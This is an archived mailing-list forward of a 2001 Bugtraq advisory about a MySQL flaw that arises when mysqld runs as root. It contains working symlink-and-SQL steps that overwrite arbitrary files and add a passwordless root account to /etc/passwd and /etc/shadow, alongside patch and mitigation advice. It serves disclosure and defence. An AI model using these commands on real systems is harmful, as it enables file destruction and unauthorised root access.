[Subject Prev][Subject Next][Thread Prev][Thread Next][Subject Index][Thread Index]

(fwd) potential vulnerability of mysqld running with root privileges (can be used as good DoS or r00t expoloit)

[Oooh, I love this exploit!  Haven't tried it myself, maybe someone on
the list can send a few mails as root from a r00ted server and confirm
it works? :-)

Please run MySQL as non-root for atleast a modicum of security --

This is an RFC 1153 digest.
(1 message)

Return-Path: <BUGTRAQ@xxxxxxxxxxxxxxxxx>
Approved-By: aleph1@xxxxxxxxxxxxxxxxx
Delivered-To: bugtraq@xxxxxxxxxxxxxxxxxxxxxxx
X-Mailer: The Bat! (v1.35) S/N 9FA473A9
X-Priority: 3 (Normal)
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID:  <15897.010318@xxxxx>
Reply-To: lesha@xxxxx
Organization: NN.ru
X-cc:         rus@xxxxxxxx, stepler@xxxxxx
From: "Pavlov, Lesha" <lesha@xxxxx>
Sender: Bugtraq List <BUGTRAQ@xxxxxxxxxxxxxxxxx>
To: BUGTRAQ@xxxxxxxxxxxxxxxxx
Subject:      potential vulnerability of mysqld running with root privileges
              (can be used as good DoS or r00t expoloit)
Date:         Sun, 18 Mar 2001 21:32:37 +0300

Anybody, who get login and password to mysql can use it as DoS or r00t
exploit because mysql accepts '../blah-blah' as valid database name and
each table represented by 3 files tablename.ISD, tablename.ISM and
tablename.frm, But, when mysqld checks table already exists or not
exists, it checks _only_ tablename.frm :

Usage this "vulnerable features of mysql" to make big DoS (Will
Overwrite any file you wish):
$ cd /var/tmp
$ ln -s /some/file/you/wish/to/owerwrite qqq.ISD
$ mysql -u user -h localhost -p somepassword '../../tmp'
create table qqq(www int);
File /some/file/you/wish/to/overwrite will be overwritten.

Usage as r00t exploit:
$ cd /var/tmp
$ ln -s /etc/passwd gotcha.ISD
$ ln -s /etc/shadow make_me_r00t.ISD
$ mysql -u user -h localhost -p somepassword '../../tmp'
create table gotcha(qqq varchar(255));
create table make_me_r00t(qqq varchar(255));
insert into gotcha values('\nr00t::0:0:Hacked_Fucked_R00T:/:/bin/sh\n');
insert into make_me_r00t values('\nr00t::1:0:99999:7:-1:-1:\n');
You getta r00t now!

* Patch mysql to when check table presents, it checks all
tablename.{ISD,ISM,frm} files, not only tablename.frm
* Patch mysql to treat database names, started by '..' as incorrect
database names.
* And Main recomendation - do not run mysqld as root!!!

 not yet

chowns existing database tables to a normal user and run mysqld as this
unprivileged user - it will be better solution!.

Vulnerable versions:
This DoS/exploit tested on mysql-3.20.32a but i see another versions of
mysql also vulnerabile.

Mysql dox recomends dont run mysqld as root, but People from RedHat
didnt read mysql dox - mysql istalled from rpm is vulnerable.


End of this Digest

Raju Mathur          raju@xxxxxxxxxxxxx           http://kandalaya.org/